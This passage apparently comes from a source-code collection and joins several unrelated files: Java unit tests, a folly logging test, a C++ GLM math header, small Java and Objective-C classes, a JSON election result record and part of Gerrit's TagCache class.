List<RelationshipDefinitionRef> relationshipDefinitionRefs = new ArrayList<RelationshipDefinitionRef>(tweety.getRelationshipDefinitionRefElements()); addRelationshipDefinition(tweety, timmyRelationship); relationshipDefinitionRefs.get(0).setTextContent(timmyRelationship.getId()); addRelationshipDefinition(daisy, daisyRelationship); relationshipDefinitionRefs.get(2).setTextContent(daisyRelationship.getId()); assertThat(tweety.getRelationshipDefinitionRefs()) .hasSize(4) .containsOnly(birdoRelationship, fiffyRelationship, timmyRelationship, daisyRelationship); } @Test public void testUpdateRelationshipDefinitionRefElementsByTextContentWithNamespace() { List<RelationshipDefinitionRef> relationshipDefinitionRefs = new ArrayList<RelationshipDefinitionRef>(tweety.getRelationshipDefinitionRefElements()); addRelationshipDefinition(tweety, timmyRelationship); relationshipDefinitionRefs.get(0).setTextContent("tns:" + timmyRelationship.getId()); addRelationshipDefinition(daisy, daisyRelationship); relationshipDefinitionRefs.get(2).setTextContent("tns:" + daisyRelationship.getId()); assertThat(tweety.getRelationshipDefinitionRefs()) .hasSize(4) .containsOnly(birdoRelationship, fiffyRelationship, timmyRelationship, daisyRelationship); } @Test public void testUpdateRelationshipDefinitionRefElementsByRemoveElements() { List<RelationshipDefinitionRef> relationshipDefinitionRefs = new ArrayList<RelationshipDefinitionRef>(tweety.getRelationshipDefinitionRefElements()); tweety.getRelationshipDefinitionRefElements().remove(relationshipDefinitionRefs.get(1)); tweety.getRelationshipDefinitionRefElements().remove(relationshipDefinitionRefs.get(3)); assertThat(tweety.getRelationshipDefinitionRefs()) .hasSize(2) .containsOnly(hedwigRelationship, pluckyRelationship); } @Test public void testClearRelationshipDefinitionRefElements() { tweety.getRelationshipDefinitionRefElements().clear(); assertThat(tweety.getRelationshipDefinitionRefElements()).isEmpty(); assertThat(tweety.getRelationshipDefinitionRefs()).isEmpty(); // should not affect animal relationship definitions assertThat(tweety.getRelationshipDefinitions()) .isNotEmpty() .hasSize(4); } @Test public void testClearRelationshipDefinitionRefElementsByClearRelationshipDefinitionRefs() { tweety.getRelationshipDefinitionRefs().clear(); assertThat(tweety.getRelationshipDefinitionRefs()).isEmpty(); assertThat(tweety.getRelationshipDefinitionRefElements()).isEmpty(); // should not affect animal relationship definitions assertThat(tweety.getRelationshipDefinitions()) .isNotEmpty() .hasSize(4); } @Test public void testClearRelationshipDefinitionRefElementsByClearRelationshipDefinitions() { tweety.getRelationshipDefinitions().clear(); assertThat(tweety.getRelationshipDefinitionRefs()).isEmpty(); assertThat(tweety.getRelationshipDefinitionRefElements()).isEmpty(); // should affect animal relationship definitions assertThat(tweety.getRelationshipDefinitions()).isEmpty(); } @Test public void testGetBestFriends() { Collection<Animal> bestFriends = tweety.getBestFriends(); assertThat(bestFriends) .isNotEmpty() .hasSize(2) .containsOnly(birdo, plucky); } @Test public void testAddBestFriend() { tweety.getBestFriends().add(daisy); Collection<Animal> bestFriends = tweety.getBestFriends(); assertThat(bestFriends) .isNotEmpty() .hasSize(3) .containsOnly(birdo, plucky, daisy); } @Test public void testRemoveBestFriendRef() { tweety.getBestFriends().remove(plucky); Collection<Animal> bestFriends = tweety.getBestFriends(); assertThat(bestFriends) .isNotEmpty() .hasSize(1) .containsOnly(birdo); } @Test public void testClearBestFriendRef() { tweety.getBestFriends().clear(); Collection<Animal> bestFriends = tweety.getBestFriends(); assertThat(bestFriends) .isEmpty(); } @Test public void testClearAndAddBestFriendRef() { tweety.getBestFriends().clear(); Collection<Animal> bestFriends = tweety.getBestFriends(); assertThat(bestFriends) .isEmpty(); bestFriends.add(daisy); assertThat(bestFriends) .hasSize(1) .containsOnly(daisy); } }
7,274
2,114
/* * Copyright 2017-present Facebook, Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ #include <folly/logging/StandardLogHandler.h> #include <folly/Conv.h> #include <folly/logging/LogCategory.h> #include <folly/logging/LogFormatter.h> #include <folly/logging/LogHandlerConfig.h> #include <folly/logging/LogLevel.h> #include <folly/logging/LogMessage.h> #include <folly/logging/LogWriter.h> #include <folly/logging/LoggerDB.h> #include <folly/portability/GTest.h> using namespace folly; using std::make_shared; namespace { class TestLogFormatter : public LogFormatter { public: std::string formatMessage( const LogMessage& message, const LogCategory* handlerCategory) override { return folly::to<std::string>( logLevelToString(message.getLevel()), "::", message.getCategory()->getName(), "::", handlerCategory->getName(), "::", message.getFileName(), "::", message.getLineNumber(), "::", message.getMessage()); } }; class TestLogWriter : public LogWriter { public: void writeMessage(folly::StringPiece buffer, uint32_t /* flags */ = 0) override { messages_.emplace_back(buffer.str()); } void flush() override {} std::vector<std::string>& getMessages() { return messages_; } const std::vector<std::string>& getMessages() const { return messages_; } bool ttyOutput() const override { return false; } private: std::vector<std::string> messages_; }; } // namespace TEST(StandardLogHandler, simple) { auto writer = make_shared<TestLogWriter>(); LogHandlerConfig config{"std_test"}; StandardLogHandler handler(config, make_shared<TestLogFormatter>(), writer); LoggerDB db{LoggerDB::TESTING}; auto logCategory = db.getCategory("log_cat"); auto handlerCategory = db.getCategory("handler_cat"); LogMessage msg{logCategory, LogLevel::DBG8, "src/test.cpp", 1234, "testMethod", std::string{"hello world"}}; handler.handleMessage(msg, handlerCategory); ASSERT_EQ(1, writer->getMessages().size()); EXPECT_EQ( "DBG8::log_cat::handler_cat::src/test.cpp::1234::hello world", writer->getMessages()[0]); } TEST(StandardLogHandler, levelCheck) { auto writer = make_shared<TestLogWriter>(); LogHandlerConfig config{"std_test"}; StandardLogHandler handler(config, make_shared<TestLogFormatter>(), writer); LoggerDB db{LoggerDB::TESTING}; auto logCategory = db.getCategory("log_cat"); auto handlerCategory = db.getCategory("handler_cat"); auto logMsg = [&](LogLevel level, folly::StringPiece message) { LogMessage msg{ logCategory, level, "src/test.cpp", 1234, "testMethod", message}; handler.handleMessage(msg, handlerCategory); }; handler.setLevel(LogLevel::WARN); logMsg(LogLevel::INFO, "info"); logMsg(LogLevel::WARN, "beware"); logMsg(LogLevel::ERR, "whoops"); logMsg(LogLevel::DBG1, "debug stuff"); auto& messages = writer->getMessages(); ASSERT_EQ(2, messages.size()); EXPECT_EQ( "WARN::log_cat::handler_cat::src/test.cpp::1234::beware", messages.at(0)); EXPECT_EQ( "ERR::log_cat::handler_cat::src/test.cpp::1234::whoops", messages.at(1)); messages.clear(); handler.setLevel(LogLevel::DBG2); logMsg(LogLevel::DBG3, "dbg"); logMsg(LogLevel::DBG1, "here"); logMsg(LogLevel::DBG2, "and here"); logMsg(LogLevel::ERR, "oh noes"); logMsg(LogLevel::DBG9, "very verbose"); ASSERT_EQ(3, messages.size()); EXPECT_EQ( "DBG1::log_cat::handler_cat::src/test.cpp::1234::here", messages.at(0)); EXPECT_EQ( "DBG2::log_cat::handler_cat::src/test.cpp::1234::and here", messages.at(1)); EXPECT_EQ( "ERR::log_cat::handler_cat::src/test.cpp::1234::oh noes", messages.at(2)); messages.clear(); }
1,646
791
#ifndef GENERATOR_MATH_HPP #define GENERATOR_MATH_HPP #define GENERATOR_USE_GLM #ifdef GENERATOR_USE_GLM #include <limits> #include <stdexcept> #include <core/math/math_includes.h> namespace gml { // Vectors using glm::bvec2; using glm::dvec2; using glm::ivec2; using glm::uvec2; using glm::vec2; using glm::bvec3; using glm::dvec3; using glm::ivec3; using glm::uvec3; using glm::vec3; using glm::bvec4; using glm::dvec4; using glm::ivec4; using glm::uvec4; using glm::vec4; // Matrices using glm::mat2; using glm::mat2x2; using glm::mat2x3; using glm::mat2x4; using glm::mat3; using glm::mat3x2; using glm::mat3x3; using glm::mat3x4; using glm::mat4; using glm::mat4x2; using glm::mat4x3; using glm::mat4x4; using glm::dmat2; using glm::dmat2x2; using glm::dmat2x3; using glm::dmat2x4; using glm::dmat3; using glm::dmat3x2; using glm::dmat3x3; using glm::dmat3x4; using glm::dmat4; using glm::dmat4x2; using glm::dmat4x3; using glm::dmat4x4; // Quaternions using glm::dquat; using glm::quat; // Functions using glm::clamp; using glm::cross; using glm::degrees; using glm::dot; using glm::max; using glm::min; using glm::mix; using glm::normalize; using glm::ortho; using glm::perspective; using glm::radians; using glm::rotate; using glm::translate; // Function substitutes template <typename T> T angle(const glm::tvec2<T>& v1, const glm::tvec2<T>& v2) { using std::acos; using std::numeric_limits; using std::sqrt; const T len = sqrt(dot(v1, v1) * dot(v2, v2)); if(len <= std::numeric_limits<T>::epsilon()) return T{0}; return acos(clamp(dot(v1, v2) / len, T{-1}, T{1})); } template <typename T> T angle(const glm::tvec3<T>& v1, const glm::tvec3<T>& v2) { using std::acos; using std::numeric_limits; using std::sqrt; const T len = sqrt(dot(v1, v1) * dot(v2, v2)); if(len <= std::numeric_limits<T>::epsilon()) return T{0}; return acos(clamp(dot(v1, v2) / len, T{-1}, T{1})); } template <typename T> glm::tvec2<T> cross(const glm::tvec2<T>& v) { return glm::tvec2<T>(-v.y, v.x); } template <typename T> glm::tvec3<T> transform(const glm::tquat<T>& q, const glm::tvec3<T>& v) { const glm::tvec3<T> temp = T{2.0} * cross(glm::tvec3<T>(q.x, q.y, q.z), v); return v + q.w * temp + cross(glm::tvec3<T>(q.x, q.y, q.z), temp); } template <typename T> glm::tquat<T> qrotate(const T& angle, const glm::tvec3<T>& axis) { using std::cos; using std::sin; const T a = angle / T{2.0}; return glm::tquat<T>{cos(a), sin(a) * axis}; } template <typename T> glm::tvec3<T> normal(const glm::tvec3<T>& p1, const glm::tvec3<T>& p2, const glm::tvec3<T>& p3) { return normalize(cross(p2 - p1, p3 - p1)); } template <typename T, typename TI, typename TS> glm::tvec3<T> project(const glm::tvec3<T>& v, const glm::tmat4x4<T>& modelViewProj, const glm::tvec2<TI>& viewportOrigin, const glm::tvec2<TS>& viewportSize) { glm::tvec4<T> in = modelViewProj * glm::tvec4<T>{v, static_cast<T>(1)}; in[0] /= in[3]; in[1] /= in[3]; in[2] /= in[3]; const auto half = static_cast<T>(0.5); in[0] = in[0] * half + half; in[1] = in[1] * half + half; in[2] = in[2] * half + half; in[0] = in[0] * static_cast<T>(viewportSize[0]) + static_cast<T>(viewportOrigin[0]); in[1] = in[1] * static_cast<T>(viewportSize[1]) + static_cast<T>(viewportOrigin[1]); return glm::tvec3<T>{in}; } template <typename T> glm::tmat4x4<T> ortho2D(const T& left, const T& right, const T& bottom, const T& top) { return ortho(left, right, bottom, top, T{-1}, T{1}); } template <typename T> glm::tvec3<T> slerp(const glm::tvec3<T>& v1, const glm::tvec3<T>& v2, const T& a) { using std::sin; const T theta = angle(v1, v2); const T sine = sin(theta); return sin((T{1} - a) * theta) / sine * v1 + sin(a * theta) / sine * v2; } template <typename T> glm::tmat4x4<T> rotate(const glm::tvec3<T>& angle) { using std::cos; using std::sin; const T sy = sin(angle[2]); const T cy = cos(angle[2]); const T sp = sin(angle[1]); const T cp = cos(angle[1]); const T sr = sin(angle[0]); const T cr = cos(angle[0]); const T data[16] = {cp * cy, sr * sp * cy + cr * -sy, cr * sp * cy + -sr * -sy, T{0}, cp * sy, sr * sp * sy + cr * cy, cr * sp * sy + -sr * cy, T{0}, -sp, sr * cp, cr * cp, T{0}, T{0}, T{0}, T{0}, T{1}}; return glm::rowMajor4(glm::make_mat4(data)); } template <typename T> glm::tmat3x3<T> rotate(const T& angle) { using std::cos; using std::sin; const T s = sin(angle); const T c = cos(angle); const T data[9] = {c, -s, T{0}, s, c, T{0}, T{0}, T{0}, T{1}}; return glm::rowMajor3(glm::make_mat3(data)); } template <typename T> glm::tvec2<T> transform(const glm::tmat3x3<T>& m, const glm::tvec2<T>& v) { return glm::tvec2<T>(m * glm::tvec3<T>(v, 1.0)); } namespace detail { template <typename VecT, typename T> VecT bezierImpl(const VecT* p, int n, T t1, T t2, int stride = 1) { if(n == 1) return *p; if(n == 2) return t1 * p[0] + t2 * p[stride]; return t1 * bezierImpl(p, n - 1, t1, t2, stride) + t2 * bezierImpl(p + stride, n - 1, t1, t2, stride); } } // detail template <int D, typename T> glm::tvec2<T> bezier(const glm::tvec2<T> (&p)[D], T t) { static_assert(D > 0, "At least one control point needed."); return detail::bezierImpl(&p[0], D, static_cast<T>(1) - t, t); } template <int D, typename T> glm::tvec3<T> bezier(const glm::tvec3<T> (&p)[D], T t) { static_assert(D > 0, "At least one control point needed."); return detail::bezierImpl(&p[0], D, static_cast<T>(1) - t, t); } template <int D0, int D1, typename T> glm::tvec3<T> bezier2(const glm::tvec3<T> (&p)[D1][D0], const glm::tvec2<T>& t) { static_assert(D0 > 0, "At least one control point needed."); static_assert(D1 > 0, "At least one control point needed."); glm::tvec3<T> temp[D1]; for(int i = 0; i < D1; ++i) { temp[i] = bezier(p[i], t[0]); } return bezier(temp, t[1]); } namespace detail { template <int O, int D, typename VecT, typename T> struct bezierDerivativeImpl { static VecT calc(const VecT (&p)[D], T t) { VecT temp[D - 1]; for(int i = 0; i < D - 1; ++i) { temp[i] = static_cast<T>(D - 1) * (p[i + 1] - p[i]); } return bezierDerivativeImpl<O - 1, D - 1, VecT, T>::calc(temp, t); } }; template <int D, typename VecT, typename T> struct bezierDerivativeImpl<0, D, VecT, T> { static VecT calc(const VecT (&p)[D], T t) { return bezier(p, t); } }; template <typename VecT, typename T> struct bezierDerivativeImpl<0, 1, VecT, T> { static VecT calc(const VecT (&p)[1], T t) { return bezier(p, t); } }; template <int O, typename VecT, typename T> struct bezierDerivativeImpl<O, 1, VecT, T> { static VecT calc(const VecT (&)[1], T) { return VecT{static_cast<T>(0)}; } }; } // detail template <int O, int D, typename T> glm::tvec2<T> bezierDerivative(const glm::tvec2<T> (&p)[D], T t) { static_assert(O > 0, "The derivative order must be at least one."); static_assert(D > 0, "At least one control point needed."); return detail::bezierDerivativeImpl<O, D, glm::tvec2<T>, T>::calc(p, t); } template <int O, int D, typename T> glm::tvec3<T> bezierDerivative(const glm::tvec3<T> (&p)[D], T t) { static_assert(O > 0, "The derivative order must be at least one."); static_assert(D > 0, "At least one control point needed."); return detail::bezierDerivativeImpl<O, D, glm::tvec3<T>, T>::calc(p, t); } template <int O, int D0, int D1, typename T> glm::tmat2x3<T> bezier2Jacobian(const glm::tvec3<T> (&p)[D1][D0], const glm::tvec2<T>& t) { static_assert(O > 0, "Order of the Jacobian must be at least one."); static_assert(D0 > 0, "At least one control point needed."); static_assert(D1 > 0, "At least one control point needed."); glm::tvec3<T> temp0[D0]; for(int i = 0; i < D0; ++i) { temp0[i] = detail::bezierImpl(&p[0][i], D1, static_cast<T>(1) - t[1], t[1], D0); } glm::tvec3<T> temp1[D1]; for(int i = 0; i < D1; ++i) { temp1[i] = bezier(p[i], t[0]); } return glm::tmat2x3<T>{bezierDerivative<O>(temp0, t[0]), bezierDerivative<O>(temp1, t[1])}; } } #else #include <gml/gml.hpp> #endif #endif
3,921
7,018
package com.tencent.mtt.supportui.utils.struct; /** * Created by leonardgong on 2018/2/9 0009. */ import java.lang.ref.WeakReference; import java.util.ArrayList; import java.util.Iterator; /** * 弱引用事件Hub * @param <T> Event */ public final class WeakEventHub<T> { private static final String TAG = "WeakEventHub"; private final ArrayList<WeakReference<T>> mListeners = new ArrayList<WeakReference<T>>(); /** * 注册观察者 * * @param listener 观察者 */ public void registerListener(T listener) { if (listener == null) { return; } synchronized (mListeners) { Iterator<WeakReference<T>> iterator = mListeners.iterator(); while (iterator.hasNext()) { WeakReference<T> weak = iterator.next(); T item = weak.get(); if (item == null) { iterator.remove(); //如果弱引用已经销毁删除 } else if (item == listener) { return; } } mListeners.add(new WeakReference<T>(listener)); } } /** * 移除观察者 * * @param listener 观察者对象 */ public void unregisterListener(T listener) { synchronized (mListeners) { if (listener != null) { Iterator<WeakReference<T>> iterator = mListeners.iterator(); while ((iterator.hasNext())) { WeakReference<T> weakReference = iterator.next(); if (weakReference != null) { T item = weakReference.get(); if (item == null || item == listener) { iterator.remove();//如果弱引用已经销毁也删除 } } } } } } /** * 获取需要通知的列表 * * @return 存活的对象引用列表 */ public Iterable<T> getNotifyListeners() { ArrayList<T> tmp = new ArrayList<T>(mListeners.size()); synchronized (mListeners) { Iterator<WeakReference<T>> iterator = mListeners.iterator(); while ((iterator.hasNext())) { WeakReference<T> weakReference = iterator.next(); if (weakReference != null) { T item = weakReference.get(); if (item == null) { iterator.remove(); //如果弱引用已经销毁删除 } else { tmp.add(item); } } } } return tmp; } public int size() { return mListeners.size(); } }
1,502
333
// // SUPH5_OCViewController.h // SuperProject // // Created by NShunJian on 2018/4/20. // Copyright © 2018年 superMan. All rights reserved. // #import "SUPWebViewController.h" @interface SUPH5_OCViewController : SUPWebViewController @end
87
1,721
<reponame>xl20071926/JPVideoPlayer<filename>JPVideoPlayerDemo/JPVideoPlayerDemo/JPVideoPlayerCollectionViewController.h // // JPVideoPlayerCollectionViewController.h // ComponentDemo // // Created by Xuzixiang on 2018/6/4. // Copyright © 2018年 frankxzx. All rights reserved. // #import <UIKit/UIKit.h> @interface JPVideoPlayerCollectionViewController : UIViewController @end
125
3,434
<gh_stars>1000+ package com.alicp.jetcache; import java.util.HashMap; import java.util.Map; import java.util.Set; import java.util.function.Function; /** * Created on 2017/5/27. * * @author <a href="mailto:<EMAIL>">huangli</a> */ @FunctionalInterface public interface CacheLoader<K, V> extends Function<K ,V> { V load(K key) throws Throwable; default Map<K, V> loadAll(Set<K> keys) throws Throwable { Map<K, V> map = new HashMap<>(); for (K k : keys) { V value = load(k); if (value != null) { map.put(k, value); } } return map; } @Override default V apply(K key) { try { return load(key); } catch (Throwable e){ throw new CacheInvokeException(e.getMessage(), e); } } default boolean vetoCacheUpdate() { return false; } }
424
826
<reponame>perlun/jackson-annotations<filename>src/main/java/com/fasterxml/jackson/annotation/Nulls.java package com.fasterxml.jackson.annotation; /** * Enumeration used with {@link JsonSetter} (for properties `nulls` * and `contentNulls`) * to define how explicit `null` values from input (if input format * has the concept; JSON, for example does) are handled. */ public enum Nulls { /** * Value that indicates that an input null should result in assignment * of Java `null` value of matching property (except where deserializer * indicates other "null value" by overriding <code>getNullValue(...)</code> * method) */ SET, /** * Value that indicates that an input null value should be skipped and * no assignment is to be made; this usually means that the property * will have its default value. */ SKIP, /** * Value that indicates that an exception (of type that indicates input mismatch * problem) is to be thrown, to indicate that null values are not accepted. */ FAIL, /** * Value that indicates that value to assign should come from the value * deserializer of the type, using method <code>getEmptyValue()</code>. */ AS_EMPTY, /** * Pseudo-value used to indicate that defaults are to be used for handling, * that is, this value specifies no explicit handling override. */ DEFAULT ; }
467
348
<reponame>chamberone/Leaflet.PixiOverlay<filename>docs/data/leg-t2/081/08102061.json {"nom":"Castanet","circ":"2ème circonscription","dpt":"Tarn","inscrits":163,"abs":60,"votants":103,"blancs":4,"nuls":10,"exp":89,"res":[{"nuance":"REM","nom":"<NAME>","voix":71},{"nuance":"FN","nom":"Mme <NAME>","voix":18}]}
130
601
#include "toml.hpp" #include <iostream> #include <iomanip> int main(int argc, char **argv) { if(argc != 3) { std::cerr << "usage: ./check [filename] [valid|invalid]" << std::endl; return 1; } const std::string file_kind(argv[2]); try { const auto data = toml::parse(argv[1]); std::cout << std::setprecision(16) << std::setw(80) << data; if(file_kind == "valid") { return 0; } else { return 1; } } catch(const toml::syntax_error& err) { std::cout << "what(): " << err.what() << std::endl; if(file_kind == "invalid") { return 0; } else { return 1; } } return 127; }
442
4,465
<filename>bridge/bindings/qjs/html_parser.h /* * Copyright (C) 2021 Alibaba Inc. All rights reserved. * Author: <NAME>. */ #ifndef KRAKENBRIDGE_HTML_PARSER_H #define KRAKENBRIDGE_HTML_PARSER_H #include "bindings/qjs/dom/element.h" #include "executing_context.h" #include "include/kraken_bridge.h" #include "third_party/gumbo-parser/src/gumbo.h" namespace kraken::binding::qjs { class HTMLParser { public: static bool parseHTML(const char* code, size_t codeLength, NodeInstance* rootNode); static bool parseHTML(std::string html, NodeInstance* rootNode); private: ExecutionContext* m_context; static void traverseHTML(NodeInstance* root, GumboNode* node); static void parseProperty(ElementInstance* element, GumboElement* gumboElement); }; } // namespace kraken::binding::qjs #endif // KRAKENBRIDGE_HTML_PARSER_H
287
403
package io.craft.atom.protocol.http.model; import static io.craft.atom.protocol.http.HttpConstants.S_COLON; import static io.craft.atom.protocol.http.HttpConstants.S_COMMA; import static io.craft.atom.protocol.http.HttpConstants.S_CR; import static io.craft.atom.protocol.http.HttpConstants.S_EQUAL_SIGN; import static io.craft.atom.protocol.http.HttpConstants.S_LF; import static io.craft.atom.protocol.http.HttpConstants.S_SEMICOLON; import static io.craft.atom.protocol.http.HttpConstants.S_SP; import java.io.Serializable; import java.util.ArrayList; import java.util.List; import lombok.Getter; import lombok.Setter; import lombok.ToString; /** * Represents a HTTP header field. * * <p> * The HTTP header fields follow the same generic format as that given in * Section 3.1 of RFC 822. Each header field consists of a name followed by a * colon (":") and the field value. Field names are case-insensitive. The field * value MAY be preceded by any amount of LWS(Linear White Space), though a single SP is preferred. * * <pre> * LWS = [CRLF] 1*( SP | HT ) * HT = Horizontal Tab * SP = Space * CRLF = Carriage return/Line feed * </pre> * * <pre> * message-header = field-name ":" [ field-value ] * field-name = token * field-value = *( field-content | LWS ) * field-content = &lt;the OCTETs making up the field-value * and consisting of either *TEXT or combinations * of token, separators, and quoted-string&gt; * </pre> * * @author mindwind * @version 1.0, Feb 1, 2013 * @see HttpMessage */ @ToString(of = { "name", "value" }) public class HttpHeader implements Serializable { private static final long serialVersionUID = -689954816191532018L; @Getter @Setter private String name ; @Getter @Setter private String value; // ~ ----------------------------------------------------------------------------------------------------------- public HttpHeader() { super(); } public HttpHeader(String name, String value) { this.name = name; this.value = value; } // ~ ----------------------------------------------------------------------------------------------------------- public void appendValue(String valuePart) { if (value == null) { value = valuePart; } else { this.value += valuePart; } } /** * Parses the header string value and return a list of {@code HttpHeaderValueElement} * * @return a list of {@code HttpHeaderValueElement} */ public List<HttpHeaderValueElement> getValueElements() { List<HttpHeaderValueElement> elements = new ArrayList<HttpHeaderValueElement>(); if (value == null || value.length() == 0) { return elements; } String[] earr = value.split(S_COMMA); for (String es : earr) { HttpHeaderValueElement hve = new HttpHeaderValueElement(); String[] nvs = es.split(S_SEMICOLON); parseNameValue(hve, nvs[0]); for (int i = 1; i < nvs.length; i++) { parseParams(hve, nvs[i]); } elements.add(hve); } return elements; } private void parseParams(HttpHeaderValueElement hve, String pnv) { String[] nvpair = pnv.split(S_EQUAL_SIGN); if (nvpair.length > 1) { hve.addParam(nvpair[0], nvpair[1]); } else { hve.addParam(nvpair[0], null); } } private void parseNameValue(HttpHeaderValueElement hve, String nv) { String[] nvpair = nv.split(S_EQUAL_SIGN); hve.setName(nvpair[0]); if (nvpair.length > 1) { hve.setValue(nvpair[1]); } } public String toHttpString() { StringBuilder sb = new StringBuilder(); sb.append(getName()).append(S_COLON).append(S_SP).append(getValue()).append(S_CR).append(S_LF); return sb.toString(); } }
1,369
743
<reponame>SidGulatiMsft/AdaptiveCards package io.adaptivecards.objectmodel; import org.junit.Assert; import org.junit.Test; import java.io.IOException; import static org.junit.Assert.*; public class SubmitActionPropertiesTest { static { System.loadLibrary("adaptivecards-native-lib"); } @Test public void AllPropertiesTest() { } @Test public void dataJsonTest() throws Exception { { SubmitAction submitAction = TestUtil.createMockSubmitAction(); Assert.assertEquals(s_defaultSubmitAction, submitAction.Serialize()); ParseResult result = AdaptiveCard.DeserializeFromString(TestUtil.encloseActionJsonInCard(s_defaultSubmitAction), "1.0"); SubmitAction parsedSubmitAction = TestUtil.castToSubmitAction(result.GetAdaptiveCard().GetActions().get(0)); Assert.assertEquals("null\n", parsedSubmitAction.GetDataJson()); } { final String submitActionWithEmptyData = "{\"data\":{},\"type\":\"Action.Submit\"}"; ParseResult result = AdaptiveCard.DeserializeFromString(TestUtil.encloseActionJsonInCard(submitActionWithEmptyData), "1.0"); SubmitAction parsedSubmitAction = TestUtil.castToSubmitAction(result.GetAdaptiveCard().GetActions().get(0)); Assert.assertEquals("{}\n", parsedSubmitAction.GetDataJson()); } { final String submitActionDataJson = "{\"data\":{\"data\":\"Some data\"},\"type\":\"Action.Submit\"}\n"; SubmitAction submitAction = TestUtil.createSampleSubmitAction(); Assert.assertEquals(submitActionDataJson, submitAction.Serialize()); ParseResult result = AdaptiveCard.DeserializeFromString(TestUtil.encloseActionJsonInCard(submitActionDataJson), "1.0"); SubmitAction parsedSubmitAction = TestUtil.castToSubmitAction(result.GetAdaptiveCard().GetActions().get(0)); Assert.assertEquals("{\"data\":\"Some data\"}\n", parsedSubmitAction.GetDataJson()); } } private static final String s_defaultSubmitAction = "{\"type\":\"Action.Submit\"}\n"; }
828
1,609
<gh_stars>1000+ package com.mossle.meeting.support; import java.text.SimpleDateFormat; import java.util.ArrayList; import java.util.Date; import java.util.Date; import java.util.List; import java.util.Map; import com.mossle.meeting.persistence.domain.MeetingInfo; import org.slf4j.Logger; import org.slf4j.LoggerFactory; public class DurationHelper { private static Logger logger = LoggerFactory .getLogger(DurationHelper.class); private String defaultStartTime = "9:00"; private String defaultEndTime = "18:00"; private long defaultStart; private long defaultEnd; private List<TimeRange> timeRanges = new ArrayList<TimeRange>(); public void process(String calendarDate, List<MeetingInfo> meetingInfos) throws Exception { defaultStart = new SimpleDateFormat("yyyy-MM-dd HH:mm").parse( calendarDate + " " + defaultStartTime).getTime(); defaultEnd = new SimpleDateFormat("yyyy-MM-dd HH:mm").parse( calendarDate + " " + defaultEndTime).getTime(); // empty if (meetingInfos.isEmpty()) { this.addTimeRange(defaultStart, defaultEnd, "idle", null); return; } // first MeetingInfo first = meetingInfos.get(0); if (first.getStartTime().getTime() > defaultStart) { this.addTimeRange(defaultStart, first.getStartTime().getTime(), "idle", null); } for (int i = 0; i < meetingInfos.size(); i++) { MeetingInfo current = meetingInfos.get(i); if (i == 0) { this.addTimeRange(current.getStartTime().getTime(), current .getEndTime().getTime(), "busy", current.getOrganizer()); continue; } MeetingInfo previous = meetingInfos.get(i - 1); if (previous.getEndTime().getTime() < current.getStartTime() .getTime()) { this.addTimeRange(previous.getEndTime().getTime(), current .getStartTime().getTime(), "idle", null); } this.addTimeRange(current.getStartTime().getTime(), current .getEndTime().getTime(), "busy", current.getOrganizer()); } // last MeetingInfo last = meetingInfos.get(meetingInfos.size() - 1); if (last.getEndTime().getTime() < defaultEnd) { this.addTimeRange(last.getEndTime().getTime(), defaultEnd, "idle", null); } } public void addTimeRange(Long start, Long end, String status, String userId) { TimeRange timeRange = new TimeRange(); timeRange.setStart(start); timeRange.setEnd(end); timeRange.setStatus(status); timeRange.setUserId(userId); logger.debug("{} {} {}", status, new Date(start), new Date(end)); timeRanges.add(timeRange); } public List<MeetingInfoDTO> getMeetingInfoDtos() throws Exception { List<MeetingInfoDTO> infos = new ArrayList<MeetingInfoDTO>(); for (TimeRange timeRange : timeRanges) { if ("idle".equals(timeRange.getStatus())) { MeetingInfoDTO meetingInfoDto = new MeetingInfoDTO(); meetingInfoDto.setStartTime(this.formatDate(timeRange .getStart())); meetingInfoDto.setEndTime(this.formatDate(timeRange.getEnd())); // meetingInfoDto.setUserId(timeRange.getUserId()); meetingInfoDto.setStatus("idle"); infos.add(meetingInfoDto); } } for (TimeRange timeRange : timeRanges) { if ("busy".equals(timeRange.getStatus())) { MeetingInfoDTO meetingInfoDto = new MeetingInfoDTO(); meetingInfoDto.setStartTime(this.formatDate(timeRange .getStart())); meetingInfoDto.setEndTime(this.formatDate(timeRange.getEnd())); meetingInfoDto.setUserId(timeRange.getUserId()); meetingInfoDto.setStatus("busy"); infos.add(meetingInfoDto); } } return infos; } public String formatDate(long time) throws Exception { return new SimpleDateFormat("HH:mm").format(new Date(time)); } }
1,979
479
<filename>gerrit-server/src/main/java/com/google/gerrit/server/git/TagCache.java // Copyright (C) 2011 The Android Open Source Project // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. package com.google.gerrit.server.git; import com.google.common.cache.Cache; import com.google.gerrit.reviewdb.client.Project; import com.google.gerrit.server.cache.CacheModule; import com.google.inject.Inject; import com.google.inject.Module; import com.google.inject.Singleton; import com.google.inject.name.Named; import java.io.IOException; import java.io.ObjectInputStream; import java.io.ObjectOutputStream; import java.io.Serializable; import org.eclipse.jgit.lib.ObjectId; @Singleton public class TagCache { private static final String CACHE_NAME = "git_tags"; public static Module module() { return new CacheModule() { @Override protected void configure() { persist(CACHE_NAME, String.class, EntryVal.class); bind(TagCache.class); } }; } private final Cache<String, EntryVal> cache; private final Object createLock = new Object(); @Inject TagCache(@Named(CACHE_NAME) Cache<String, EntryVal> cache) { this.cache = cache; } /** * Advise the cache that a reference fast-forwarded. * * <p>This operation is not necessary, the cache will automatically detect changes made to * references and update itself on demand. However, this method may allow the cache to update more * quickly and reuse the caller's computation of the fast-forward status of a branch. * * @param name project the branch is contained in. * @param refName the branch name. * @param oldValue the old value, before the fast-forward. The cache will only update itself if it * is still using this old value. * @param newValue the current value, after the fast-forward. */ public void updateFastForward( Project.NameKey name, String refName, ObjectId oldValue, ObjectId newValue) { // Be really paranoid and null check everything. This method should // never fail with an exception. Some of these references can be null // (e.g. not all projects are cached, or the cache is not current). // EntryVal val = cache.getIfPresent(name.get()); if (val != null) { TagSetHolder holder = val.holder; if (holder != null) { TagSet tags = holder.getTagSet(); if (tags != null) { if 